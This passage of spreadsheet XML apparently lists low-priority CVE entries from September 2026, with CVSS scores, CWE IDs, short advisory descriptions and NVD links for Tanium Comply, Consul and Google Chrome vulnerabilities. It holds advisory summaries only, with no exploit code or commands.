      <c r="J4993" s="5" t="inlineStr"/>
      <c r="K4993" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4993" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87025</t>
        </is>
      </c>
    </row>
    <row r="4994">
      <c r="A4994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87033</t>
        </is>
      </c>
      <c r="C4994" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4994" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4994" s="5" t="inlineStr"/>
      <c r="F4994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4994" s="5" t="inlineStr"/>
      <c r="H4994" s="5" t="inlineStr"/>
      <c r="I4994" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4994" s="5" t="inlineStr"/>
      <c r="K4994" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4994" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87033</t>
        </is>
      </c>
    </row>
    <row r="4995">
      <c r="A4995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87037</t>
        </is>
      </c>
      <c r="C4995" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4995" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4995" s="5" t="inlineStr"/>
      <c r="F4995" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4995" s="5" t="inlineStr"/>
      <c r="H4995" s="5" t="inlineStr"/>
      <c r="I4995" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4995" s="5" t="inlineStr"/>
      <c r="K4995" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4995" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87037</t>
        </is>
      </c>
    </row>
    <row r="4996">
      <c r="A4996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87048</t>
        </is>
      </c>
      <c r="C4996" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4996" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4996" s="5" t="inlineStr"/>
      <c r="F4996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4996" s="5" t="inlineStr"/>
      <c r="H4996" s="5" t="inlineStr"/>
      <c r="I4996" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4996" s="5" t="inlineStr"/>
      <c r="K4996" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4996" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87048</t>
        </is>
      </c>
    </row>
    <row r="4997">
      <c r="A4997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87107</t>
        </is>
      </c>
      <c r="C4997" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4997" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4997" s="5" t="inlineStr"/>
      <c r="F4997" s="5" t="inlineStr"/>
      <c r="G4997" s="5" t="inlineStr"/>
      <c r="H4997" s="5" t="inlineStr"/>
      <c r="I4997" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4997" s="5" t="inlineStr"/>
      <c r="K4997" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4997" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to an authorization bypass in the catalog deregistration path that may allow a local ACL token to delete peer-imported catalog objects. A caller with {{service:write}} or {{node:write}} permission may exploit this issue to remove services, checks, or nodes imported from a peered cluster without holding authority over the peer origin. This vulnerability (CVE-2026-87107) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M4997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87107</t>
        </is>
      </c>
    </row>
    <row r="4998">
      <c r="A4998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87445</t>
        </is>
      </c>
      <c r="C4998" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4998" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4998" s="5" t="inlineStr"/>
      <c r="F4998" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4998" s="5" t="inlineStr"/>
      <c r="H4998" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4998" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4998" s="5" t="inlineStr"/>
      <c r="K4998" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L4998" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Session in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87445</t>
        </is>
      </c>
    </row>
    <row r="4999">
      <c r="A4999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87458</t>
        </is>
      </c>
      <c r="C4999" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4999" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4999" s="5" t="inlineStr"/>
      <c r="F4999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4999" s="5" t="inlineStr"/>
      <c r="H4999" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4999" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4999" s="5" t="inlineStr"/>
      <c r="K4999" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L4999" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Geometry in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87458</t>
        </is>
      </c>
    </row>
    <row r="5000">
      <c r="A5000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87462</t>
        </is>
      </c>
      <c r="C5000" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5000" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5000" s="5" t="inlineStr"/>
      <c r="F5000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5000" s="5" t="inlineStr"/>
      <c r="H5000" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5000" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5000" s="5" t="inlineStr"/>
      <c r="K5000" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5000" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87462</t>
        </is>
      </c>
    </row>
    <row r="5001">
      <c r="A5001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87484</t>
        </is>
      </c>
      <c r="C5001" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5001" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5001" s="5" t="inlineStr"/>
      <c r="F5001" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5001" s="5" t="inlineStr"/>
      <c r="H5001" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5001" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5001" s="5" t="inlineStr"/>
      <c r="K5001" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5001" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Geometry in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87484</t>
        </is>
      </c>
    </row>
    <row r="5002">
      <c r="A5002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87496</t>
        </is>
      </c>
      <c r="C5002" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5002" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5002" s="5" t="inlineStr"/>
      <c r="F5002" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5002" s="5" t="inlineStr"/>
      <c r="H5002" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5002" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5002" s="5" t="inlineStr"/>
      <c r="K5002" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5002" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87496</t>
        </is>
      </c>
    </row>
    <row r="5003">
      <c r="A5003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87501</t>
        </is>
      </c>
      <c r="C5003" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5003" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5003" s="5" t="inlineStr"/>
      <c r="F5003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5003" s="5" t="inlineStr"/>
      <c r="H5003" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5003" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5003" s="5" t="inlineStr"/>
      <c r="K5003" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5003" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87501</t>
        </is>
      </c>
    </row>
    <row r="5004">
      <c r="A5004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87507</t>
        </is>
      </c>
      <c r="C5004" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5004" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5004" s="5" t="inlineStr"/>
      <c r="F5004" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5004" s="5" t="inlineStr"/>
      <c r="H5004" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5004" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5004" s="5" t="inlineStr"/>
      <c r="K5004" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5004" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87507</t>
        </is>
      </c>
    </row>
    <row r="5005">
      <c r="A5005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87540</t>
        </is>
      </c>
      <c r="C5005" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5005" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5005" s="5" t="inlineStr"/>
      <c r="F5005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5005" s="5" t="inlineStr"/>
      <c r="H5005" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5005" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5005" s="5" t="inlineStr"/>
      <c r="K5005" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5005" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87540</t>
        </is>
      </c>
    </row>
    <row r="5006">
      <c r="A5006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87571</t>
        </is>
      </c>
      <c r="C5006" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5006" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5006" s="5" t="inlineStr"/>
      <c r="F5006" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5006" s="5" t="inlineStr"/>
      <c r="H5006" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5006" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5006" s="5" t="inlineStr"/>
      <c r="K5006" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5006" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87571</t>
        </is>
      </c>
    </row>
    <row r="5007">
      <c r="A5007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87575</t>
        </is>
      </c>
      <c r="C5007" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5007" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5007" s="5" t="inlineStr"/>
      <c r="F5007" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5007" s="5" t="inlineStr"/>
      <c r="H5007" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5007" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5007" s="5" t="inlineStr"/>
      <c r="K5007" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5007" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87575</t>
        </is>
      </c>
    </row>
    <row r="5008">
      <c r="A5008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87583</t>
        </is>
      </c>
      <c r="C5008" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5008" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5008" s="5" t="inlineStr"/>
      <c r="F5008" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5008" s="5" t="inlineStr"/>
      <c r="H5008" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5008" s="5" t="inlineStr"/>
      <c r="K5008" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5008" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87583</t>
        </is>
      </c>
    </row>
    <row r="5009">
      <c r="A5009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87599</t>
        </is>
      </c>
      <c r="C5009" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5009" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5009" s="5" t="inlineStr"/>
      <c r="F5009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5009" s="5" t="inlineStr"/>
      <c r="H5009" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5009" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5009" s="5" t="inlineStr"/>
      <c r="K5009" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5009" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Interstitials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87599</t>
        </is>
      </c>
    </row>
    <row r="5010">
      <c r="A5010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87615</t>
        </is>
      </c>
      <c r="C5010" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5010" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5010" s="5" t="inlineStr"/>
      <c r="F5010" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5010" s="5" t="inlineStr"/>
      <c r="H5010" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5010" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5010" s="5" t="inlineStr"/>
      <c r="K5010" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5010" s="5" t="inlineStr">
        <is>
          <t>Race condition in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87615</t>
        </is>
      </c>
    </row>
    <row r="5011">
      <c r="A5011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87635</t>
        </is>
      </c>
      <c r="C5011" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5011" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5011" s="5" t="inlineStr"/>
      <c r="F5011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5011" s="5" t="inlineStr"/>
      <c r="H5011" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5011" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5011" s="5" t="inlineStr"/>
      <c r="K5011" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5011" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87635</t>
        </is>
      </c>
    </row>
    <row r="5012">
      <c r="A5012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87645</t>
        </is>
      </c>
      <c r="C5012" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5012" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5012" s="5" t="inlineStr"/>
      <c r="F5012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5012" s="5" t="inlineStr"/>
      <c r="H5012" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5012" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5012" s="5" t="inlineStr"/>
      <c r="K5012" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L5012" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87645</t>
        </is>
      </c>
    </row>
    <row r="5013">
      <c r="A5013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87649</t>
        </is>
      </c>
      <c r="C5013" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5013" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5013" s="5" t="inlineStr"/>
      <c r="F5013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5013" s="5" t="inlineStr"/>
      <c r="H5013" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5013" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5013" s="5" t="inlineStr"/>
      <c r="K5013" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5013" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87649</t>
        </is>
      </c>
    </row>
    <row r="5014">
      <c r="A5014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87653</t>
        </is>
      </c>
      <c r="C5014" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5014" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5014" s="5" t="inlineStr"/>
      <c r="F5014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5014" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H5014" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I5014" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5014" s="5" t="inlineStr"/>
      <c r="K5014" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5014" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FullScreen in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87653</t>
        </is>
      </c>
    </row>
    <row r="5015">
      <c r="A5015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87655</t>
        </is>
      </c>
      <c r="C5015" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5015" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5015" s="5" t="inlineStr"/>
      <c r="F5015" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5015" s="5" t="inlineStr"/>
      <c r="H5015" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5015" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5015" s="5" t="inlineStr"/>
      <c r="K5015" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L5015" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87655</t>
        </is>
      </c>
    </row>
    <row r="5016">
      <c r="A5016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87656</t>
        </is>
      </c>
      <c r="C5016" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D5016" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5016" s="5" t="inlineStr"/>
      <c r="F5016" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5016" s="5" t="inlineStr"/>
      <c r="H5016" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5016" s="5" t="inlineStr">
